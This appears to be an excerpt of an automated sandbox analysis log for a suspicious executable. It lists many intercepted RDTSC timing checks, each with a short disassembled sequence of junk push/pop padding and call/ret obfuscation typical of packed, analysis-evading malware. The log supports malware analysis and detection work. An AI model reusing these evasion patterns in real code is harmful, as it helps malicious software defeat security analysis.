Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1000D7C second address: 1000D97 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 js 00007F76E5186DE6h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1000D97 second address: 1000D9C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 105E269 second address: 105E26F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 105E26F second address: 105E294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F76E5036BA6h 0x0000000e jmp 00007F76E5036BB7h 0x00000013 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 105E294 second address: 105E29E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F76E5186DE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 105E29E second address: 105E2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007F76E5036BA6h 0x00000010 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 105E2AE second address: 105E2CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F76E5186DEAh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F76E5186DE6h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 105E2CB second address: 105E2E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10027C1 second address: 10027DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF2h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10027DB second address: 1002812 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F76E5036BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnp 00007F76E5036BAAh 0x00000013 pushad 0x00000014 jg 00007F76E5036BA6h 0x0000001a push edi 0x0000001b pop edi 0x0000001c jmp 00007F76E5036BB2h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1002812 second address: 1002816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 105F822 second address: 105F88A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e jmp 00007F76E5036BAFh 0x00000013 popad 0x00000014 nop 0x00000015 sub dword ptr [ebp+12488575h], edx 0x0000001b mov dword ptr [ebp+122D2FCEh], ecx 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push edx 0x00000026 call 00007F76E5036BA8h 0x0000002b pop edx 0x0000002c mov dword ptr [esp+04h], edx 0x00000030 add dword ptr [esp+04h], 0000001Ch 0x00000038 inc edx 0x00000039 push edx 0x0000003a ret 0x0000003b pop edx 0x0000003c ret 0x0000003d mov di, cx 0x00000040 xor di, C0FEh 0x00000045 push 00000000h 0x00000047 mov edi, ecx 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e jnc 00007F76E5036BA6h 0x00000054 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 105F88A second address: 105F88E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 105F88E second address: 105F894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1063B96 second address: 1063BB8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F76E5186DECh 0x00000008 jns 00007F76E5186DE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jng 00007F76E5186DECh 0x00000018 jbe 00007F76E5186DE6h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 pop eax 0x00000022 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1064C15 second address: 1064C1B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1067287 second address: 106728B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 106728B second address: 1067291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1067291 second address: 10672D7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F76E5186DECh 0x00000008 jnp 00007F76E5186DE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ecx 0x00000012 push ebx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop ebx 0x00000016 pop ecx 0x00000017 nop 0x00000018 mov di, 7400h 0x0000001c push 00000000h 0x0000001e mov bl, 4Ch 0x00000020 mov bx, dx 0x00000023 push 00000000h 0x00000025 cld 0x00000026 mov dword ptr [ebp+124778CFh], esi 0x0000002c xchg eax, esi 0x0000002d push edi 0x0000002e jmp 00007F76E5186DF1h 0x00000033 pop edi 0x00000034 push eax 0x00000035 push ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 push edi 0x00000039 pop edi 0x0000003a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10078C2 second address: 1007901 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F76E5036BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F76E5036BC0h 0x00000013 jbe 00007F76E5036BB2h 0x00000019 jne 00007F76E5036BA6h 0x0000001f jnp 00007F76E5036BA6h 0x00000025 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 106B6B5 second address: 106B6BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 106C7A7 second address: 106C7AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 106C7AD second address: 106C7FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F76E5186DE8h 0x00000010 pop edx 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F76E5186DE8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c xor dword ptr [ebp+1247CBE1h], eax 0x00000032 push 00000000h 0x00000034 stc 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+122D30EDh], eax 0x0000003d add dword ptr [ebp+122D2D0Dh], esi 0x00000043 xchg eax, esi 0x00000044 push ebx 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 106F844 second address: 106F84A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 106F84A second address: 106F862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76E5186DF4h 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1005E6C second address: 1005E99 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F76E5036BACh 0x00000008 jl 00007F76E5036BA6h 0x0000000e jmp 00007F76E5036BB3h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jo 00007F76E5036BC9h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1005E99 second address: 1005EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1079A54 second address: 1079A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1079A58 second address: 1079A6A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F76E5186DEAh 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1079A6A second address: 1079A6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1079BEF second address: 1079BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1079BF5 second address: 1079C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F76E5036BB0h 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1079D73 second address: 1079D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1079D79 second address: 1079D81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1079D81 second address: 1079D8B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F76E5186DF2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1053C1A second address: 1053C24 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F76E5036BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1053C24 second address: 1053C2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1055F6A second address: 1055F95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F76E5036BB2h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f jg 00007F76E5036BA6h 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007F76E5036BA6h 0x0000001e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 105F9E0 second address: 105F9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1060ADC second address: 1060AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1061B43 second address: 1061B47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1061B47 second address: 1061C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F76E5036BAAh 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F76E5036BA8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 jmp 00007F76E5036BB8h 0x0000002c jbe 00007F76E5036BACh 0x00000032 mov ebx, dword ptr [ebp+122D257Eh] 0x00000038 push dword ptr fs:[00000000h] 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007F76E5036BA8h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 00000017h 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 jmp 00007F76E5036BADh 0x0000005e mov dword ptr fs:[00000000h], esp 0x00000065 sub ebx, 2572B7F8h 0x0000006b mov eax, dword ptr [ebp+122D1669h] 0x00000071 pushad 0x00000072 mov dword ptr [ebp+122D293Bh], ebx 0x00000078 clc 0x00000079 popad 0x0000007a push FFFFFFFFh 0x0000007c push eax 0x0000007d pushad 0x0000007e jmp 00007F76E5036BADh 0x00000083 push eax 0x00000084 push edx 0x00000085 jl 00007F76E5036BA6h 0x0000008b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1063CD5 second address: 1063CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1064DC3 second address: 1064DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1064E81 second address: 1064E9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F76E5186DEAh 0x00000008 jp 00007F76E5186DE6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push ecx 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 106B905 second address: 106B90B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 106E9DE second address: 106E9E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1070A39 second address: 1070A49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1071B37 second address: 1071B3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 106E9E2 second address: 106E9EC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F76E5036BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1070A49 second address: 1070A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1069388 second address: 1069436 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov di, B681h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov edi, dword ptr [ebp+122D2ACBh] 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push esi 0x00000027 call 00007F76E5036BA8h 0x0000002c pop esi 0x0000002d mov dword ptr [esp+04h], esi 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc esi 0x0000003a push esi 0x0000003b ret 0x0000003c pop esi 0x0000003d ret 0x0000003e pushad 0x0000003f add ecx, dword ptr [ebp+122D2AD7h] 0x00000045 mov dx, cx 0x00000048 popad 0x00000049 mov eax, dword ptr [ebp+122D0545h] 0x0000004f push 00000000h 0x00000051 push ebp 0x00000052 call 00007F76E5036BA8h 0x00000057 pop ebp 0x00000058 mov dword ptr [esp+04h], ebp 0x0000005c add dword ptr [esp+04h], 0000001Dh 0x00000064 inc ebp 0x00000065 push ebp 0x00000066 ret 0x00000067 pop ebp 0x00000068 ret 0x00000069 jp 00007F76E5036BA6h 0x0000006f push FFFFFFFFh 0x00000071 sbb bx, 4CD9h 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 jbe 00007F76E5036BACh 0x0000007f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1070A4E second address: 1070A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b jne 00007F76E5186DE6h 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1069436 second address: 106943B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1070B4B second address: 1070B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007F76E5186DEAh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F76E5186DF9h 0x00000013 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1070B77 second address: 1070B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1080103 second address: 1080113 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F76E5186DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1080113 second address: 108011C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 108011C second address: 108013A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 108013A second address: 1080157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F76E5036BA6h 0x0000000a popad 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop edx 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 jo 00007F76E5036BB0h 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1080200 second address: 1080207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1080207 second address: 108020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 108020D second address: 1080211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10802E4 second address: EA3B51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jo 00007F76E5036BBAh 0x00000011 jmp 00007F76E5036BB4h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jbe 00007F76E5036BAEh 0x00000020 pop eax 0x00000021 stc 0x00000022 push dword ptr [ebp+122D06E1h] 0x00000028 clc 0x00000029 call dword ptr [ebp+122D219Bh] 0x0000002f pushad 0x00000030 jnc 00007F76E5036BA7h 0x00000036 xor eax, eax 0x00000038 pushad 0x00000039 xor esi, 7ABDAB1Ch 0x0000003f mov dx, di 0x00000042 popad 0x00000043 mov edx, dword ptr [esp+28h] 0x00000047 mov dword ptr [ebp+122D220Ch], edx 0x0000004d stc 0x0000004e mov dword ptr [ebp+122D2A9Bh], eax 0x00000054 mov dword ptr [ebp+122D292Ch], edx 0x0000005a mov esi, 0000003Ch 0x0000005f clc 0x00000060 or dword ptr [ebp+122D220Ch], ebx 0x00000066 add esi, dword ptr [esp+24h] 0x0000006a stc 0x0000006b lodsw 0x0000006d cld 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 xor dword ptr [ebp+122D292Ch], esi 0x00000078 jmp 00007F76E5036BB4h 0x0000007d mov ebx, dword ptr [esp+24h] 0x00000081 mov dword ptr [ebp+122D292Ch], ecx 0x00000087 push eax 0x00000088 jbe 00007F76E5036BB8h 0x0000008e push eax 0x0000008f push edx 0x00000090 jno 00007F76E5036BA6h 0x00000096 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1084249 second address: 1084262 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10843C7 second address: 10843E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB4h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10846C3 second address: 10846C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 108499A second address: 10849A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
